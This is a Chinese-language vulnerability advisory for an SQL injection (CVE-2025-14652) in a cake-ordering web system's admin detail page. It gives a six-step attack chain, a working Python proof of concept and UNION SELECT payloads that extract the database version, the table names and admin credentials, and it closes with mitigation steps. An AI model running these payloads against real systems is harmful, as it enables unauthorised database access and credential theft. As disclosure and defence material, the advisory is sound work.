CVE-2025-14652 | itsourcecode Online Cake Ordering System SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-14652

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Online Cake Ordering System 1.0

漏洞概述

CVE-2025-14652是itsourcecode在线蛋糕订购系统1.0版本中的一个高危SQL注入漏洞。该系统是一款基于Web的蛋糕在线订购管理平台，广泛应用于小型蛋糕店和烘焙企业的线上业务管理。漏洞存在于系统的管理员详情页面，具体位于/admindetail.php文件中的编辑功能模块。攻击者可以通过构造恶意的ID参数值，利用SQL注入漏洞获取数据库中的敏感信息，包括管理员账户凭据、用户个人信息、订单数据等。该漏洞的CVSS评分为7.3，属于高危级别，攻击复杂度低，无需认证即可发起攻击。由于该漏洞的利用代码已在公开渠道发布，潜在威胁较大。建议受影响的用户尽快采取防护措施或升级到安全版本。

技术细节

该SQL注入漏洞源于系统对用户输入参数ID缺乏有效的过滤和验证。在/admindetail.php文件中，当action参数设置为edit时，系统会直接将该ID参数的值传递给SQL查询语句，而未使用参数化查询或输入过滤机制。攻击者可以通过在ID参数中注入SQL恶意payload，如使用UNION SELECT、布尔盲注或时间盲注等技术，从数据库中提取敏感信息。典型的攻击Payload可能包括：ID参数使用单引号触发SQL语法错误，或使用UNION语句联合查询获取数据库版本、当前数据库名、表名等信息。由于该系统可能使用MySQL数据库，攻击者还可能通过LOAD_FILE()函数读取服务器敏感文件，或通过INTO OUTFILE将恶意代码写入服务器实现远程代码执行。漏洞影响系统的机密性、完整性和可用性，攻击者可完全控制数据库并可能进一步入侵服务器。

攻击链分析

STEP 1

步骤1: 侦察和信息收集

攻击者首先识别目标系统是否为itsourcecode Online Cake Ordering System 1.0，通过指纹识别技术确定系统版本和组件信息

STEP 2

步骤2: 漏洞探测

访问/admindetail.php?action=edit页面，通过在ID参数中注入单引号或逻辑测试语句（如1' AND '1'='1）验证SQL注入漏洞是否存在

STEP 3

步骤3: 数据库指纹识别

利用SQL注入获取数据库类型和版本信息，如MySQL版本号、当前数据库名等，为后续数据提取做准备

STEP 4

步骤4: 数据表枚举

通过注入UNION SELECT语句或使用information_schema表查询系统中存在的所有数据表，识别存储用户和管理员信息的表

STEP 5

步骤5: 敏感数据提取

从管理员表中提取用户名和密码哈希值，可能还包括其他敏感用户数据如订单信息、个人身份信息等

STEP 6

步骤6: 权限提升和持久化

使用获取的凭据登录管理后台，可能进一步利用系统功能实现远程代码执行或植入后门，实现长期持久化控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-14652 PoC - SQL Injection in itsourcecode Online Cake Ordering System 1.0
# Target: /admindetail.php?action=edit

def exploit_sqli(target_url, payload):
    """
    Exploit SQL injection vulnerability in ID parameter
    """
    # Construct malicious URL with SQL injection payload
    vuln_url = f"{target_url}/admindetail.php?action=edit&ID={payload}"
    
    try:
        response = requests.get(vuln_url, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

def extract_database_version(target_url):
    """
    Extract database version using UNION-based injection
    """
    # Payload to extract MySQL version
    payload = "1' UNION SELECT NULL,@@version,NULL,NULL,NULL-- -"
    print(f"[*] Extracting database version...")
    result = exploit_sqli(target_url, payload)
    if result:
        print(f"[+] Database version info retrieved")
    return result

def extract_database_name(target_url):
    """
    Extract current database name
    """
    payload = "1' UNION SELECT NULL,database(),NULL,NULL,NULL-- -"
    print(f"[*] Extracting database name...")
    result = exploit_sqli(target_url, payload)
    if result:
        print(f"[+] Database name retrieved")
    return result

def extract_tables(target_url):
    """
    Extract table names from database
    """
    payload = "1' UNION SELECT NULL,group_concat(table_name),NULL,NULL,NULL FROM information_schema.tables WHERE table_schema=database()-- -"
    print(f"[*] Extracting table names...")
    result = exploit_sqli(target_url, payload)
    if result:
        print(f"[+] Tables retrieved")
    return result

def extract_admin_credentials(target_url, table_name):
    """
    Extract admin credentials from target table
    """
    payload = f"1' UNION SELECT NULL,group_concat(username,0x3a,password),NULL,NULL,NULL FROM {table_name}-- -"
    print(f"[*] Extracting admin credentials from {table_name}...")
    result = exploit_sqli(target_url, payload)
    if result:
        print(f"[+] Admin credentials retrieved")
    return result

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://target.com/cake-ordering-system")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    
    print(f"[*] CVE-2025-14652 - SQL Injection in {target}")
    print(f"[*] Target endpoint: /admindetail.php?action=edit&ID=")
    
    # Step 1: Detect vulnerability
    print(f"\n[*] Step 1: Testing for SQL injection...")
    test_payload = "1' AND '1'='1"
    exploit_sqli(target, test_payload)
    
    # Step 2: Extract database info
    print(f"\n[*] Step 2: Extracting database information...")
    extract_database_version(target)
    extract_database_name(target)
    
    # Step 3: Enumerate tables
    print(f"\n[*] Step 3: Enumerating database tables...")
    extract_tables(target)
    
    print(f"\n[!] Manual verification required to identify admin table name")

影响范围

itsourcecode Online Cake Ordering System 1.0

防御指南

临时缓解措施

在官方修复方案发布之前，建议采取以下临时缓解措施：1) 通过Web服务器配置（如Nginx/Apache的URL重写规则）限制对/admindetail.php的访问，仅允许受信任的IP地址访问管理功能；2) 在应用层实现输入过滤，在ID参数处理前进行严格的正则表达式验证，确保只接受数字字符；3) 临时禁用受影响的管理功能模块；4) 启用数据库审计日志，密切监控异常查询行为；5) 实施IP黑名单机制，阻止已知恶意IP地址的访问请求；6) 考虑部署双因素认证保护管理后台，即使凭据泄露也能防止未授权访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14652
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14652
3 Details https://www.cvedetails.com/cve/CVE-2025-14652/
4 VulDB https://vuldb.com/cve/CVE-2025-14652
5 Link https://github.com/moonrains/test/issues/1
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/?ctiid.336385
8 Link https://vuldb.com/?id.336385
9 Link https://vuldb.com/?submit.712648